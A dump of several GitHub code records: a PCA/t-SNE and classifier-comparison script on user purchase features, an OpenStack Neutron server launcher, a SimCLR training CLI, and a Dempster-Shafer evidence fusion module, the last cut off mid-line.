'user_OtherTimesFromPvToBuy', 'user_OtherTimesFromFavToBuy',\r\n 'user_OtherTimesFromCartToBuy', 'user_OtherTimesFromBuyToBuy',\r\n 'user_BrandPvToBuyTime', 'user_BrandFavToBuyTime', 'user_BrandCartToBuyTime',\r\n 'user_CatePvToBuyTime', 'user_CateFavToBuyTime', 'user_CateCartToBuyTime',\r\n 'user_BrandViewTime', 'user_CateViewTime', 'user_ReBuyBrandViewTime', 'user_ReBuyCateViewTime']\r\n\r\ntemparray = np.array(feature, dtype=float)\r\nm, n = temparray.shape\r\n# 归一化每一个特征\r\nfor j in range(n):\r\n features = temparray[:, j]\r\n meanVal = np.mean(features, axis=0)\r\n std = np.std(features, axis=0)\r\n if std != 0:\r\n # temparray[:, j] = (features - meanVal) / std\r\n temparray[:, j] = features / std\r\n else:\r\n temparray[:, j] = 0\r\n\r\npca = PCA(n_components=26, whiten=True)\r\n# pca = PCA(n_components='mle')\r\npca.fit(temparray)\r\nprint(pca.explained_variance_)\r\nprint(pca.explained_variance_ratio_)\r\nprint(pca.n_components)\r\n\r\nX = pca.transform(temparray)\r\ndata_pca_tsne = TSNE(n_components=2).fit_transform(X)\r\nfirstFea = data_pca_tsne[:, 0]\r\nsecondFea = data_pca_tsne[:, 1]\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nax.set_title(\"Scatter Plot\")\r\ntrueIdx = myfind(1, y)\r\nax.scatter(firstFea[trueIdx], secondFea[trueIdx], c='r', marker='o')\r\nfalseIdx = myfind(-1, y)\r\nax.scatter(firstFea[falseIdx], secondFea[falseIdx], c='g', marker='*')\r\nplt.show()\r\n\r\n#\r\n# maxFeature = 23\r\n# timestampMaxFeature = 6\r\n# numMaxFeature = 12\r\n# model2 = SelectKBest(chi2, k=maxFeature)#选择k个最佳特征\r\n# model2.fit_transform(temparray, y)\r\n# # model2.fit_transform(final, y)\r\n# featureScore = model2.scores_.tolist()\r\n# maxIndex = [0]\r\n# timestampNumTag = 0\r\n# numTag = 0\r\n# for i in range(maxFeature):\r\n# index = featureScore.index(max(featureScore))\r\n# if index in timestampFeatureList and timestampNumTag < timestampMaxFeature:\r\n# maxIndex.append(index)\r\n# timestampNumTag = timestampNumTag + 1\r\n#\r\n# if index in numFeatureList and numTag < numMaxFeature:\r\n# maxIndex.append(index)\r\n# numTag = numTag + 1\r\n#\r\n# featureScore[index] = 0\r\n#\r\n# print(maxIndex)\r\n#\r\n#\r\n# # k = 0\r\n# # for i in range(featureLength):\r\n# # while k in unusedFeatureList:\r\n# # k = k + 1\r\n# # if k < featureLength:\r\n# # print(k, i, user_FeatureRecord[k], model2.scores_[i])\r\n# # k = k + 1\r\n#\r\n# finalFeature = []\r\n# # for row in final:\r\n# for row in temparray:\r\n# # temp = [row[11], row[12], row[13], row[16], row[18], row[20], row[22], row[25],\r\n# # row[27], row[28], row[29]]\r\n# temp = []\r\n# for i in maxIndex:\r\n# temp.append(row[i])\r\n# finalFeature.append(temp)\r\n#\r\n# temparray = np.array(finalFeature, dtype=float)\r\n#\r\n# temparray = X\r\n#\r\n# trainRate = 0.8\r\n# x_trainSeq = random.sample(list(range(0, trueNum)), int(math.floor(trainRate * trueNum)))\r\n# y_trainSeq = random.sample(list(range(0, fraudNum)), int(math.floor(trainRate * fraudNum)))\r\n#\r\n# x_train = []\r\n# x_test = []\r\n# y_train = []\r\n# y_test = []\r\n#\r\n# trueRecord = 0\r\n# fraudRecord = 0\r\n# for i in list(range(0, m)):\r\n# if y[i] == 1:\r\n# if trueRecord in x_trainSeq:\r\n# x_train.append(temparray[i])\r\n# y_train.append(y[i])\r\n# else:\r\n# x_test.append(temparray[i])\r\n# y_test.append(y[i])\r\n# trueRecord = trueRecord + 1\r\n# else:\r\n# if fraudRecord in y_trainSeq:\r\n# x_train.append(temparray[i])\r\n# y_train.append(y[i])\r\n# else:\r\n# x_test.append(temparray[i])\r\n# y_test.append(y[i])\r\n# fraudRecord = fraudRecord + 1\r\n#\r\n# classifier = svm.SVC(C=0.1, kernel='linear', decision_function_shape='ovr', probability=True)\r\n# # classifier = svm.SVC(C=0.8, kernel='rbf', gamma=20, decision_function_shape='ovr')\r\n# classifier.fit(x_train, y_train)\r\n#\r\n# print(\"训练集准确率\" + str(classifier.score(x_train, y_train))) # 精度\r\n# y_hat = classifier.predict(x_train)\r\n# print(y_hat)\r\n# # num = 0\r\n# # for i in list(range(0, len(y_train))):\r\n# # if y_train[i] == y_hat[i]:\r\n# # num = num + 1\r\n# #\r\n# # print(num / len(y_train))\r\n# print(\"测试集准确率\" + str(classifier.score(x_test, y_test)))\r\n# y_hat = classifier.predict(x_test)\r\n# print(y_hat)\r\n# fraudTestNum = 0\r\n# recognizeNum = 0\r\n# trueTestNum = 0\r\n# falseRecognizeNum = 0\r\n# for i in range(len(y_hat)):\r\n# print(y_test[i], y_hat[i])\r\n# if y_test[i] == -1:\r\n# fraudTestNum = fraudTestNum + 1\r\n# if y_hat[i] == -1:\r\n# recognizeNum = recognizeNum + 1\r\n# if y_test[i] == 1:\r\n# trueTestNum = trueTestNum + 1\r\n# if y_hat[i] == -1:\r\n# falseRecognizeNum = falseRecognizeNum + 1\r\n#\r\n# print(recognizeNum / fraudTestNum)\r\n# print(falseRecognizeNum / trueTestNum)\r\n# # print(y_test)\r\n#\r\n# #效果评估:\r\n# #准确率:scikit-learn提供了accuracy_score来计算:LogisticRegression.score()\r\n# #准确率是分类器预测正确性的比例,但是并不能分辨出假阳性错误和假阴性错误\r\n# # cv 交叉验证 次数\r\n# print(\"交叉验证:\")\r\n# scores = cross_val_score(classifier, x_train, y_train, cv=5)\r\n# print('训练准确率:', np.mean(scores), scores)\r\n#\r\n# scores = cross_val_score(classifier, x_test, y_test, cv=5)\r\n# print('测试准确率:', np.mean(scores), scores)\r\n#\r\n# precisions = cross_val_score(classifier, x_train, y_train, cv=5, scoring='precision')\r\n# print(u'精确率:', np.mean(precisions), precisions)\r\n# recalls = cross_val_score(classifier, x_train, y_train, cv=5, scoring='recall')\r\n# print(u'召回率:', np.mean(recalls), recalls)\r\n# plt.scatter(recalls, precisions)\r\n#\r\n# # 综合评价指标\r\n# f1s = cross_val_score(classifier, x_train, y_train, cv=5, scoring='f1')\r\n# print('综合评价指标:', np.mean(f1s), f1s)\r\n# # 综合评价指标是80%。由于精确率和召回率的差异比较小,所以综合评价指标的罚值也比较小。有时也会用F0.5和F2,表示精确率权重大于召回率,或召回率权重大于精确率。\r\n#\r\n# # ROC AUC\r\n# # ROC曲线(Receiver Operating Characteristic,ROC curve)可以用来可视化分类器的效果。和准确率不同,ROC曲线对分类比例不平衡的数据集不敏感,ROC曲线显示的是对超过限定阈值的所有预测结果的分类器效果。ROC曲线画的是分类器的召回率与误警率(fall-out)的曲线。误警率也称假阳性率,是所有阴性样本中分类器识别为阳性的样本所占比例:\r\n# # F=FP/(TN+FP) AUC是ROC曲线下方的面积,它把ROC曲线变成一个值,表示分类器随机预测的效果. from sklearn.metrics import roc_curve, auc\r\n# from sklearn.metrics import roc_curve, auc\r\n#\r\n# predictions = classifier.predict_proba(x_test)\r\n# false_positive_rate, recall, thresholds = roc_curve(y_test, predictions[:, 1])\r\n# roc_auc = auc(false_positive_rate, recall)\r\n# plt.title('SVM Receiver Operating Characteristic')\r\n# plt.plot(false_positive_rate, recall, 'b', label='AUC = %0.2f' % roc_auc)\r\n# plt.legend(loc='lower right')\r\n# plt.plot([0, 1], [0, 1], 'r--')\r\n# plt.xlim([0.0, 1.0])\r\n# plt.ylim([0.0, 1.0])\r\n# plt.ylabel('Recall')\r\n# plt.xlabel('Fall-out')\r\n# plt.show()\r\n# # plt.savefig(\"../FeatureCate\" + str(cate) + \"/SVM_ROC.png\")\r\n#\r\n#\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import ListedColormap\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.datasets import make_moons, make_circles, make_classification\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.gaussian_process import GaussianProcessClassifier\r\nfrom sklearn.gaussian_process.kernels import RBF\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\r\n\r\nh = .02 # step size in the mesh\r\n\r\nnames = [\"Nearest Neighbors\", \"Linear SVM\", \"RBF SVM\", \"Gaussian Process\",\r\n \"Decision Tree\", \"Random Forest\", \"Neural Net\", \"AdaBoost\",\r\n \"Naive Bayes\", \"QDA\"]\r\n\r\nclassifiers = [\r\n KNeighborsClassifier(3),\r\n SVC(kernel=\"linear\", C=0.025),\r\n SVC(gamma=2, C=1),\r\n GaussianProcessClassifier(1.0 * RBF(1.0)),\r\n DecisionTreeClassifier(max_depth=5),\r\n RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),\r\n MLPClassifier(alpha=1),\r\n AdaBoostClassifier(),\r\n GaussianNB(),\r\n QuadraticDiscriminantAnalysis()]\r\n\r\nX = data_pca_tsne\r\n\r\nfigure = plt.figure(figsize=(27, 9))\r\ni = 1\r\n# iterate over datasets\r\n\r\n# preprocess dataset, split into training and test part\r\n\r\nX = StandardScaler().fit_transform(X)\r\nX_train, X_test, y_train, y_test = \\\r\n train_test_split(X, y, test_size=.4, random_state=42)\r\n\r\nx_min, x_max = X.min() - .5, X.max() + .5\r\ny_min, y_max = y.min() - .5, y.max() + .5\r\nxx, yy = np.meshgrid(np.arange(x_min, x_max, h),\r\n np.arange(y_min, y_max, h))\r\n\r\n# just plot the dataset first\r\ncm_bright = ListedColormap(['#FF0000', '#0000FF'])\r\nax = plt.subplot(len(datasets), len(classifiers) + 1, i)\r\n\r\nax.set_title(\"Input data\")\r\n# Plot the training points\r\nax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\r\n edgecolors='k')\r\n# and testing points\r\nax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright, alpha=0.6,\r\n edgecolors='k')\r\nax.set_xlim(xx.min(), xx.max())\r\nax.set_ylim(yy.min(), yy.max())\r\nax.set_xticks(())\r\nax.set_yticks(())\r\ni += 1\r\n\r\n# iterate over classifiers\r\nfor name, clf in zip(names, classifiers):\r\n ax = plt.subplot(len(datasets), len(classifiers) + 1, i)\r\n clf.fit(X_train, y_train)\r\n score = clf.score(X_test, y_test)\r\n\r\n # Plot the decision boundary. For that, we will assign a color to each\r\n # point in the mesh [x_min, x_max]x[y_min, y_max].\r\n if hasattr(clf, \"decision_function\"):\r\n Z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])\r\n else:\r\n Z = clf.predict_proba(np.c_[xx.ravel(), yy.ravel()])[:, 1]\r\n\r\n # Put the result into a color plot\r\n Z = Z.reshape(xx.shape)\r\n ax.contourf(xx, yy, Z, alpha=.8)\r\n\r\n # Plot also the training points\r\n ax.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cm_bright,\r\n edgecolors='k')\r\n # and testing points\r\n ax.scatter(X_test[:, 0], X_test[:, 1], c=y_test, cmap=cm_bright,\r\n edgecolors='k', alpha=0.6)\r\n\r\n ax.set_xlim(xx.min(), xx.max())\r\n ax.set_ylim(yy.min(), yy.max())\r\n ax.set_xticks(())\r\n ax.set_yticks(())\r\n\r\n ax.set_title(name)\r\n ax.text(xx.max() - .3, yy.min() + .3, ('%.2f' % score).lstrip('0'),\r\n size=15, horizontalalignment='right')\r\n i += 1\r\n\r\nplt.tight_layout()\r\nplt.show()","repo_name":"Change72/gc-python-graduate","sub_path":"FeatureCate669/16withBrand_fifth.py","file_name":"16withBrand_fifth.py","file_ext":"py","file_size_in_byte":13235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14863437351","text":"import eventlet\nimport sys\n\nfrom oslo.config import cfg\n\nfrom neutron.common import config\nfrom neutron import service\n\nfrom neutron.openstack.common import gettextutils\nfrom neutron.openstack.common import log as logging\ngettextutils.install('neutron', lazy=True)\n\nLOG = logging.getLogger(__name__)\n\n\ndef main():\n eventlet.monkey_patch()\n\n # the configuration will be read into the cfg.CONF global data structure\n config.parse(sys.argv[1:])\n if not cfg.CONF.config_file:\n sys.exit(_(\"ERROR: Unable to find configuration file via the default\"\n \" search paths (~/.neutron/, ~/, /etc/neutron/, /etc/) and\"\n \" the '--config-file' option!\"))\n try:\n pool = eventlet.GreenPool()\n\n neutron_api = service.serve_wsgi(service.NeutronApiService)\n api_thread = pool.spawn(neutron_api.wait)\n\n try:\n neutron_rpc = service.serve_rpc()\n except NotImplementedError:\n LOG.info(_(\"RPC was already started in parent process by plugin.\"))\n else:\n rpc_thread = pool.spawn(neutron_rpc.wait)\n\n # api and rpc should die together. When one dies, kill the other.\n rpc_thread.link(lambda gt: api_thread.kill())\n api_thread.link(lambda gt: rpc_thread.kill())\n\n pool.waitall()\n except KeyboardInterrupt:\n pass\n except RuntimeError as e:\n sys.exit(_(\"ERROR: %s\") % e)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/neutron/neutron/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"73819426688","text":"import argparse \nimport torch\nimport torchvision\nimport utils\nimport simclr\nfrom PIL import Image\nimport os\n\n# making a command line interface\nparser = argparse.ArgumentParser(description=\"This is the command line interface for the SimCLR framework for self-supervised learning. Below are the arguments which are required to run this program.\")\n\nparser.add_argument('datapath', type=str ,help=\"Path to the data root folder which contains train and test folders\")\n\nparser.add_argument('respath', type=str, help=\"Path to the results directory where the saved model and evaluation graphs would be stored. \")\n\nparser.add_argument('-bs','--batch_size',default=250, type=int, help=\"The batch size for self-supervised training\")\n\nparser.add_argument('-nw','--num_workers',default=2,type=int,help=\"The number of workers for loading data\")\n\nparser.add_argument('-c','--cuda',action='store_true')\n\nparser.add_argument('--multiple_gpus', action='store_true')\n\nclass TrainDataset(torch.utils.data.Dataset):\n\n def __init__(self, args):\n self.args = args\n \n with open(os.path.join(args.datapath, \"train\",\"names.txt\")) as f:\n self.filenames = f.read().split('\\n')\n \n def __len__(self):\n return len(self.filenames)\n\n def tensorify(self, img):\n return torchvision.transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(\n torchvision.transforms.ToTensor()(img)\n )\n\n def augmented_image(self, img):\n return utils.transforms.get_color_distortion(1)(\n torchvision.transforms.RandomResizedCrop(224)(img)\n ) \n\n def __getitem__(self, idx):\n img = torchvision.transforms.Resize((224, 224))(\n Image.open(os.path.join(args.datapath, 'train', self.filenames[idx])).convert('RGB')\n )\n return {\n 'image1':self.tensorify(\n self.augmented_image(img)\n ), \n 'image2': self.tensorify(\n self.augmented_image(img)\n )\n }\n\nif __name__ == '__main__':\n args = parser.parse_args()\n args.device = torch.device('cuda' if args.cuda else 'cpu')\n model = utils.model.get_model(args)\n \n optimizer = torch.optim.Adam(\n model.parameters(), \n lr=0.001, \n weight_decay=1e-4\n )\n \n dataloaders = {}\n \n dataloaders['train'] = torch.utils.data.DataLoader(\n TrainDataset(args), \n batch_size=args.batch_size, \n shuffle=True, \n num_workers=args.num_workers\n )\n \n loss_fn = utils.ntxent.loss_function\n simclrobj = simclr.SimCLR(model, optimizer, dataloaders, loss_fn)\n simclrobj.train(args, 200, 10)\n","repo_name":"thunderInfy/simclr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"43"} +{"seq_id":"13739593012","text":"import time\n\nimport numpy as np\nimport torch\n\nfrom distance import cosine_distance, js_distance, bhattacharyya_distance, entropy, cosine_distance_torch, \\\n js_distance_torch, bhattacharyya_distance_torch\n\n\ndef calc_conflict(a: np.ndarray, b: np.ndarray) -> float:\n assert len(a.shape) == 1, f\"expected array a's shape be (N,), having {a.shape}\"\n assert len(b.shape) == 1, f\"expected array b's shape be (N,), having {b.shape}\"\n assert a.shape[0] == b.shape[0], f\"expected array a and b have same length, having a: {a.shape} and b: {b.shape}\"\n\n a, b = np.expand_dims(a, axis=-1), np.expand_dims(b, axis=-1)\n\n return np.dot(a, b.T).sum() - np.dot(a.T, b).sum()\n\n\ndef ds_fusion_numpy(e: np.ndarray, distance: str, beta: np.ndarray, W: np.ndarray, RI=None):\n \"\"\"\n improved label fusion method based on D-S Evidence Theory using subjective and objective evidence in numpy\n :param e: evidences to be fused, shape=(L, N)\n :param distance: distance metric\n :param beta: subjective weights, shape=(M, L)\n :param W: AHP comparison matrix, shape=(M+1,M+1)\n :param RI: RI,must be input when M>=10\n :return: fusion result, shape=(N,)\n \"\"\"\n\n if distance == 'cos':\n distance_func = cosine_distance\n elif distance == 'js':\n distance_func = js_distance\n elif distance == 'bd':\n distance_func = bhattacharyya_distance\n else:\n raise Exception(f'no distance function called {distance}')\n\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(i + 1, e.shape[0]):\n dis_matrix[i, j] = dis_matrix[j, i] = distance_func(e[i], e[j])\n\n d = np.sum(dis_matrix, axis=-1)\n\n alpha = 1. / d\n alpha = alpha / alpha.sum()\n\n if W.shape[0] > 10 and RI is None:\n raise Exception(\"RI required\")\n\n RI_table = [0, 0, 0, .58, .90, 1.12, 1.24, 1.32, 1.41, 1.45, 1.49]\n if W.shape[0] <= 10:\n RI = RI_table[W.shape[0]]\n\n value, vector = np.linalg.eig(W)\n\n lambda_max, lambda_index = value.max(), value.argmax()\n CI = (lambda_max - W.shape[0]) / (W.shape[0] - 1)\n if CI / RI > 0.1:\n raise Exception(\"consistency check failed\")\n\n x = vector[:, lambda_index]\n x = np.expand_dims(np.real(x / x.sum()), 0)\n\n delta = np.vstack((np.asarray([alpha]), beta))\n delta = delta / delta.sum(axis=-1, keepdims=True)\n delta = np.dot(x, delta)\n\n e_ = np.sum(delta.T * e, axis=0)\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict(result, e_))\n\n return result\n\n\ndef calc_conflict_torch(a: torch.Tensor, b: torch.Tensor) -> float:\n a, b = torch.unsqueeze(a, dim=-1), torch.unsqueeze(b, dim=-1)\n\n return (a @ b.T).sum() - (a.T @ b).sum()\n\n\ndef ds_fusion_torch(e: torch.Tensor, distance: str, beta: torch.Tensor, W: torch.Tensor, RI=None):\n if distance == 'cos':\n distance_func = cosine_distance_torch\n elif distance == 'js':\n distance_func = js_distance_torch\n elif distance == 'bd':\n distance_func = bhattacharyya_distance_torch\n else:\n raise Exception(f'no distance function called {distance}')\n\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(i + 1, e.shape[0]):\n dis_matrix[i, j] = dis_matrix[j, i] = distance_func(e[i], e[j])\n\n d = torch.clip(torch.sum(dis_matrix, dim=-1), min=1e-6, max=1e6)\n\n alpha = 1. / d\n alpha = alpha / alpha.sum()\n\n if W.shape[0] > 10 and RI is None:\n raise Exception(\"RI required\")\n\n RI_table = [0, 0, 0, .58, .90, 1.12, 1.24, 1.32, 1.41, 1.45, 1.49]\n if W.shape[0] <= 10:\n RI = RI_table[W.shape[0]]\n\n value, vector = torch.linalg.eig(W)\n\n lambda_max, lambda_index = torch.max(value.real).item(), torch.argmax(value.real).item()\n\n CI = (lambda_max - W.shape[0]) / (W.shape[0] - 1)\n if W.shape[0] > 2 and CI / RI > 0.1:\n raise Exception(\"consistency check failed\")\n\n x = vector[:, lambda_index].real\n x = torch.unsqueeze(x / x.sum(), 0)\n\n delta = torch.vstack((torch.unsqueeze(alpha, 0), beta))\n delta = delta / torch.sum(delta, dim=-1, keepdim=True)\n delta = x @ delta\n\n e_ = torch.sum(delta.T * e, dim=0)\n\n result = torch.clone(e_)\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict_torch(result, e_))\n\n return result\n\n\ndef contrast_algorithm_zhang(e: np.ndarray):\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = bhattacharyya_distance(e[i], e[j])\n\n d = np.sum(dis_matrix, axis=-1)\n\n alpha = 1. / d\n alpha = alpha / alpha.sum()\n alpha = np.expand_dims(alpha, axis=0)\n\n e_ = np.sum(alpha.T * e, axis=0)\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict(result, e_)\n\n return result\n\n\ndef contrast_algorithm_Bai(e: np.ndarray, b=10):\n import pyemd\n\n distance_matrix = (np.ones((b, b)) - np.identity(b)) * np.sqrt(2)\n\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = pyemd.emd(e[i], e[j], distance_matrix)\n\n sim_matrix = np.exp(-dis_matrix)\n\n sup = sim_matrix.sum(axis=-1) - 1\n\n w_crd = sup / sup.sum()\n\n e = np.clip(e, 1e-6, 1e6)\n\n E_d = -np.sum(e * np.log(e), axis=-1)\n\n m_plus = e[np.argmin(E_d)]\n m_minus = e[np.argmax(E_d)]\n\n bmd_max = pyemd.emd(m_plus, m_minus, distance_matrix)\n D_minus = np.zeros((e.shape[0],))\n for i in range(e.shape[0]):\n D_minus[i] = pyemd.emd(e[i], m_minus, distance_matrix)\n\n chi_minus = D_minus / bmd_max\n chi_minus = np.clip(chi_minus, 1e-7, 1e6)\n true_mask = chi_minus <= 0.75\n false_mask = chi_minus > 0.75\n\n I = chi_minus * true_mask + (1 - chi_minus) * false_mask\n\n w_dist = I / I.sum()\n\n W = w_dist * w_crd\n W = W / W.sum()\n W = np.expand_dims(W, axis=0)\n\n e_ = np.sum(W.T * e, axis=0)\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict(result, e_)\n\n return result\n\n\ndef contrast_algorithm_zhang_torch(e: torch.Tensor):\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = bhattacharyya_distance_torch(e[i], e[j])\n\n D = torch.sum(dis_matrix, dim=-1)\n alpha = 1. / D\n alpha = alpha / alpha.sum()\n alpha = torch.unsqueeze(alpha, dim=0)\n\n e_ = torch.sum(alpha.T * e, dim=0)\n\n result = e_.clone()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict_torch(result, e_)\n\n return result\n\n\ndef contrast_algorithm_jiang(e: np.ndarray):\n def jousselme_distance(p: np.ndarray, q: np.ndarray):\n return np.sqrt(0.5 * np.dot(np.expand_dims(p - q, axis=0), np.expand_dims(p - q, axis=-1)))\n\n dis_matrix = np.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = jousselme_distance(e[i], e[j])\n\n d_bar = dis_matrix.sum(axis=-1) / (e.shape[0] - 1)\n d = d_bar.sum() / e.shape[0]\n credible_mask = d_bar <= d\n incredible_mask = d_bar > d\n\n e = np.clip(e, a_min=1e-6, a_max=1e6)\n\n E_d = -np.sum(e * np.log(e), axis=-1)\n E_d = E_d / E_d.sum()\n\n alpha = credible_mask * np.exp(-E_d) + incredible_mask * np.exp(-(np.max(E_d) + 1 - E_d))\n w = np.expand_dims(alpha / alpha.sum(), axis=0)\n\n e_ = np.sum(w.T * e, axis=0)\n e_ = e_ / e_.sum()\n\n result = e_.copy()\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict(result, e_))\n\n return result\n\n\ndef contrast_algorithm_jiang_torch(e: torch.Tensor):\n def jousselme_distance(p: torch.Tensor, q: torch.Tensor):\n return torch.sqrt(0.5 * (torch.unsqueeze(p - q, dim=0) @ torch.unsqueeze(p - q, dim=-1)))\n\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = jousselme_distance(e[i], e[j])\n\n d_bar = dis_matrix.sum(dim=-1) / (e.shape[0] - 1)\n d = d_bar.sum() / e.shape[0]\n credible_mask = d_bar <= d\n incredible_mask = d_bar > d\n\n e = torch.clip(e, min=1e-6, max=1e6)\n\n E_d = -torch.sum(e * torch.log(e), dim=-1)\n E_d = E_d / E_d.sum()\n\n alpha = credible_mask * torch.exp(-E_d) + incredible_mask * torch.exp(-(torch.max(E_d) + 1 - E_d))\n w = torch.unsqueeze(alpha / alpha.sum(), dim=0)\n\n e_ = torch.sum(w.T * e, dim=0)\n e_ = e_ / e_.sum()\n\n result = e_.clone()\n for i in range(e.shape[0] - 1):\n result = result * e_ / (1 - calc_conflict_torch(result, e_))\n\n return result\n\n\ndef contrast_algorithm_bai_torch(e: torch.Tensor, b=10):\n import pyemd\n\n distance_matrix = (np.ones((b, b)) - np.identity(b)) * np.sqrt(2)\n\n dis_matrix = torch.zeros((e.shape[0], e.shape[0]))\n for i in range(e.shape[0]):\n for j in range(e.shape[0]):\n if i != j:\n dis_matrix[i, j] = pyemd.emd(e[i].numpy().astype(np.float64), e[j].numpy().astype(np.float64), distance_matrix)\n\n sim_matrix = torch.exp(-dis_matrix)\n\n sup = sim_matrix.sum(dim=-1) - 1\n\n w_crd = sup / sup.sum()\n\n E_d = -torch.sum(e * torch.log(e), dim=-1)\n\n m_plus = e[torch.argmin(E_d)]\n m_minus = e[torch.argmax(E_d)]\n\n bmd_max = pyemd.emd(m_plus.numpy().astype(np.float64), m_minus.numpy().astype(np.float64), distance_matrix)\n D_minus = torch.zeros((e.shape[0],))\n for i in range(e.shape[0]):\n D_minus[i] = pyemd.emd(e[i].numpy().astype(np.float64), m_minus.numpy().astype(np.float64), distance_matrix)\n\n chi_minus = D_minus / bmd_max\n true_mask = chi_minus <= 0.75\n false_mask = chi_minus > 0.75\n I = chi_minus * true_mask + (1 - chi_minus) * false_mask\n\n w_dist = I / I.sum()\n\n W = w_dist * w_crd\n W = W / W.sum()\n W = torch.unsqueeze(W, dim=0)\n\n e_ = torch.sum(W.T * e, dim=0)\n\n result = e_.clone()\n for i in range(e.shape[0] - 1):\n result = result * e_ + result * calc_conflict_torch(result, e_)\n\n return result\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n a = np.asarray([1.04e-6, 4.20e-5, 1.09e-2, 4.00e-1, 1.23e-2, 5.71e-1, 3.16e-3, 2.05e-3, 1.56e-5, 1.20e-5])\n b = np.asarray([6.61e-6, 1.37e-5, 7.01e-5, 7.34e-3, 1.01e-5, 9.92e-1, 5.03e-5, 1.27e-5, 5.70e-6, 3.66e-6])\n c = np.asarray([2.22e-8, 1.97e-7, 4.99e-4, 6.07e-1, 1.29e-4, 3.84e-1, 7.93e-3, 1.02e-4, 8.10e-8, 6.29e-6])\n\n cos_result = ds_fusion_numpy(np.asarray([a, b, c]), distance='cos',\n beta=np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]]),\n W=np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]]))\n\n cos_result_torch = ds_fusion_torch(torch.from_numpy(np.asarray([a, b, c])), distance='cos',\n beta=torch.from_numpy(np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]])),\n W=torch.from_numpy(np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]])))\n\n js_result = ds_fusion_numpy(np.asarray([a, b, c]), distance='js',\n beta=np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]]),\n W=np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]]))\n\n bd_result = ds_fusion_numpy(np.asarray([a, b, c]), distance='bd',\n beta=np.asarray([[0.8317, 0.8726, 0.7857],\n [0.8366, 0.8735, 0.7828],\n [1, 1, 0.8]]),\n W=np.asarray([[1, 4, 5, 9],\n [1 / 4, 1, 1, 5],\n [1 / 5, 1, 1, 5],\n [1 / 9, 1 / 5, 1 / 5, 1]]))\n\n zhang_result = contrast_algorithm_zhang(np.asarray([a, b, c]))\n\n jiang_result = contrast_algorithm_jiang(np.asarray([a, b, c]))\n\n # bai_result = contrast_algorithm_bai_torch(torch.from_numpy(np.asarray([a, b, c])))\n bai_result = contrast_algorithm_Bai(np.asarray([a, b, c]))\n\n print(cos_result, js_result, bd_result, zhang_result, jiang_result, bai_result, sep='\\n')\n\n entropy_list = [entropy(jiang_result, jiang_result),\n entropy(bai_result, bai_result),\n entropy(cos_result, cos_result),\n entropy(js_result, js_result),\n entropy(bd_result, bd_result),\n ]\n prob_list = [\n jiang_result.max(),\n bai_result.max(),\n cos_result.max(),\n js_result.max(),\n bd_result.max(),\n ]\n\n l = [i for i in range(5)]\n\n plt.bar(l, prob_list, color='yellow', label='probability', alpha=0.5, width=0.5)\n plt.xlabel(\"methods\")\n plt.ylabel(\"probability\")\n plt.legend(loc=\"upper 